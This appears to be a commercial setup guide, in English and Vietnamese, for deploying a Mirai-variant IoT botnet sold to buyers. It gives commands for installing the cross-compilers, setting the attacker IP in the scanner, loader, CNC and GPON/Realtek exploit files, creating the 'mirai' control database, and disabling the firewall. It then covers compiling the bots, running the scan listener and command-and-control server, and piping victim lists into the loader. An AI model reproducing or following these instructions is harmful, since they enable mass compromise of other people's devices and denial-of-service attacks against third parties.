// Copy paste this code and put it all on your terminal all at once:

yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

cd /tmp
wget https://dl.google.com/go/go1.13.linux-amd64.tar.gz
sha256sum go1.13.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.13.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export GOROOT=/usr/local/go; export GOPATH=$HOME/Projects/Proj1; export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords
source ~/.bash_profile
go version
go env
cd ~/

mkdir /etc/xcompile
cd /etc/xcompile
DOWNLOAD HERE CROSS COMPILER https://mega.nz/folder/B6AGhDRI#WXd5CxQKliLIfH0M4pV8tg
DRAG ALL FILE IN FOLDER cross-compiler to /etc/xcompile

tar -xf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -xf cross-compiler-i486.tar.gz
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
rm -rf *.tar.bz2
rm -rf *.tar.gz
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
mv cross-compiler-i486 i486
mv cross-compiler-i586 i586
mv cross-compiler-i686 i686
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv cross-compiler-x86_64 x86_64


// CHANGE IP (find 0.0.0.0 and change to your IP)
scanListen.go
loader/src/main.c
loader/src/header/config.h
dlr/main.c (Thay đổi các dấu chấm trong IP thành dấu ,)
cnc/main.go
bot/gpon80_scanner.c
bot/gpon8080_scanner.c
bot/includes.h
bot/realtek.c


// We will setup the database, run these commands on your terminal:

yum install mariadb-server -y
service mariadb restart

// Thay đổi password mysql
mysql_secure_installation

// Now Login with your mysql pass by running this command:

mysql -u root -pPASSWORDMYSQL

// Now we will add the database, copy and paste this on your terminal:

CREATE DATABASE mirai;
use mirai;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, 'USERNAME', 'PASSWORD', 0, 0, 0, 0, -1, 1, 30, '');
exit;

// Now your database is complete, we will restart and disable services:

service iptables stop 
service httpd restart  
service mariadb restart

// Alright, we have to compile the bot and screen the cnc server by doing this:

cd ~/
chmod 777 *
sh build.sh

nano /usr/include/bits/typesizes.h
scroll down and edit the 1024 to 999999
THEN SAVE IT 
ulimit -n999999; ulimit -u999999; ulimit -e999999

// Run scanlisten
cd loader
screen ./scanListen

// Run c&c
screen ./cnc

C&C Port: 3778

Thắc mắc?

1. enc.c dùng để làm gì?
- enc.c là công cụ XOR các thông tin ở trong tệp table.c dùng để bảo mật, những ai mày mò tìm hiểu về src thì cần một công cụ enc

2. Nơi mua vps hosting botnet tốt?
- crazyrdp.com là nơi hosting botnet và scanning tốt nhất.

3. Làm sao để có bots?
- Có nhiều cách để infect các thiết bị IoT, trong đó có 2 cách phổ biến là brute và exploit

4. Làm cách nào để load bots khi có list sẵn?
- Kéo tệp list vào thư mục loader, nhớ là khi build xong botnet mới kéo vào, sau khi kéo xong nhập các lệnh
cd loader/
cat filename.txt | ./loader
trong đó filename.txt là tên tệp list, ở đây sau khi mua hàng, khách hàng sẽ được tặng list có sẵn để thử nghiệm

Tất cả methods đều hoạt động, cảm ơn bạn đã mua hàng <3
